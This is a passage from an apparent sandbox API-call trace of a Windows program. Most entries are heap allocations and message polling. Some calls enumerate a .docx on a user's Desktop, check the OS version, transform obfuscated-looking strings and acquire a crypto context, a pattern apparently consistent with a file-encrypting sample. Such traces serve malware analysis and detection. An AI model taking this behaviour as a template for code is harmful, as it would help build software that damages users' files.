(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0160.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0160.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0160.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0160.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0160.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0160.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0160.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0160.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0160.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0160.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0160.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0160.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0160.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0160.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0160.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0160.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0160.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0160.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0160.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0160.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0160.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0160.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0160.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.823] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0160.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0160.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0160.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0160.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0160.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0160.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0160.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0160.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0160.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0160.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0160.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0160.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0160.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0160.824] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0160.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0160.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0160.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0160.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0160.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0160.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0160.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0160.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0160.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0160.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0160.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0160.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0160.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0160.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0160.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.825] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/6qT95vcU.docx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x974a3450, ftCreationTime.dwHighDateTime=0x1d4d511, ftLastAccessTime.dwLowDateTime=0x23e5a160, ftLastAccessTime.dwHighDateTime=0x1d4cf72, ftLastWriteTime.dwLowDateTime=0x23e5a160, ftLastWriteTime.dwHighDateTime=0x1d4cf72, nFileSizeHigh=0x0, nFileSizeLow=0xdc6b, dwReserved0=0xca10006, dwReserved1=0xd038, cFileName="6qT95vcU.docx", cAlternateFileName="6QT95V~1.DOC")) returned 0xaa55e0 [0160.825] FindClose (in: hFindFile=0xaa55e0 | out: hFindFile=0xaa55e0) returned 1 [0160.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0160.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0160.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.826] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0160.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0160.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0160.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0160.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0160.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0160.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0160.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0160.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0160.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0160.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0160.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0160.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0160.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0160.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0160.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.828] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0160.828] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0160.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.828] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.828] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0160.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.828] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.829] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.829] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0160.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.829] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0160.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.829] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0160.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.829] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0160.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.829] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0160.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0160.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.830] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.830] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0160.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0160.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.831] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.831] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.831] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0160.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.832] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.832] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0160.832] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.832] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.832] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.832] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.832] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.832] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.832] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0160.832] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0160.832] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.832] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.832] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0160.832] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.833] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0160.833] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0160.833] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0160.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0160.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0160.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0160.833] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0160.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0160.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0160.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0160.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0160.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0160.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0160.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0160.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0160.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0160.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0160.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0160.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: 